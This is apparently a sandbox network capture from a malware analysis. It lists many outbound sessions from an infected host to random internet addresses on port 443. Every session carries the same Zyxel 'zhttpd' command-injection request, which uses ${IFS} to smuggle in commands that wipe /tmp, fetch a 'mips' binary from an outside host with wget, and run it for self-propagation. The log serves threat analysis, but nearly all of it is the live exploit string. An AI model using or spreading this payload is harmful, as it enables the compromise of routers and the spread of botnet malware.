                              Mar 31, 2024 08:41:03.483020067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              277192.168.2.1346440194.162.67.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483062029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              278192.168.2.1342328114.136.228.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483093023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              279192.168.2.1356094185.14.10.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483124018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              280192.168.2.1353868204.241.61.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483165026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              281192.168.2.134180690.231.137.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483198881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              282192.168.2.133548445.54.131.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483227968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              283192.168.2.1337554108.138.111.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483268976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              284192.168.2.134417097.97.30.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483294010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              285192.168.2.135333682.18.221.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483340979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              286192.168.2.1337458169.239.224.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483372927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              287192.168.2.133372297.77.231.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483407021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              288192.168.2.1337736129.188.59.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483455896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              289192.168.2.13420945.91.95.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483493090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              290192.168.2.1351628155.14.47.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483522892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              291192.168.2.1352380212.122.151.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483556032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              292192.168.2.1338492117.110.59.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483599901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              293192.168.2.1337226116.253.203.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483629942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              294192.168.2.134121491.67.68.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483704090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              295192.168.2.13398201.10.214.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483733892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              296192.168.2.1354856181.118.228.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483776093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              297192.168.2.1339702139.131.6.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483800888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              298192.168.2.1337338181.218.232.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483836889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              299192.168.2.1340310128.12.134.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483900070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              300192.168.2.133290037.127.54.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483930111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              301192.168.2.1342314221.73.113.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.483958006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              302192.168.2.133518638.111.37.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484019041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              303192.168.2.135855891.58.23.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484047890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              304192.168.2.134229481.216.52.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484090090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              305192.168.2.1332810135.19.44.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484142065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              306192.168.2.135143613.192.85.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484170914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              307192.168.2.1333376116.77.175.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484211922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              308192.168.2.134648883.60.253.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484245062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              309192.168.2.1359264181.139.202.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484297037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              310192.168.2.1357814143.104.243.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484359980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              311192.168.2.1360306184.35.209.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484402895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              312192.168.2.1352958192.120.190.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484431028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              313192.168.2.135950293.17.95.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484467983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              314192.168.2.135024458.193.52.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484502077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              315192.168.2.1354996146.65.99.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484530926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              316192.168.2.1347554113.49.54.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484579086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              317192.168.2.135223288.146.73.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484627962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              318192.168.2.1357426180.174.0.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484654903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              319192.168.2.1356066137.158.200.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484702110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              320192.168.2.1343038149.152.43.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484736919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              321192.168.2.133697662.187.10.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484786987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              322192.168.2.1349642197.4.86.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484807968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              323192.168.2.1346820126.30.12.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484863997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              324192.168.2.1345932132.169.197.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484882116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              325192.168.2.1356530159.95.60.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484936953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              326192.168.2.1347334171.2.92.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.484988928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              327192.168.2.1337584160.13.137.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485011101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              328192.168.2.1337404103.60.56.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485054016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              329192.168.2.133776851.173.23.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485096931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              330192.168.2.1341036160.31.119.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485142946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              331192.168.2.134376268.138.7.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485172033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              332192.168.2.13366904.16.89.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485204935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              333192.168.2.134832045.115.75.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485250950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              334192.168.2.1340412111.158.102.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485270977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              335192.168.2.1347254218.135.111.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485332966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              336192.168.2.134537453.47.139.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485379934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              337192.168.2.1345292202.40.105.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485403061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              338192.168.2.134336012.101.200.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485450029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              339192.168.2.1350518189.49.38.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485502958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              340192.168.2.1340872167.54.42.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485526085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              341192.168.2.1359390126.130.153.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485558033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              342192.168.2.1333732217.200.224.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485610962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              343192.168.2.135650024.111.224.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485657930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              344192.168.2.1357266105.138.55.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485675097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              345192.168.2.133403640.87.152.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485721111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
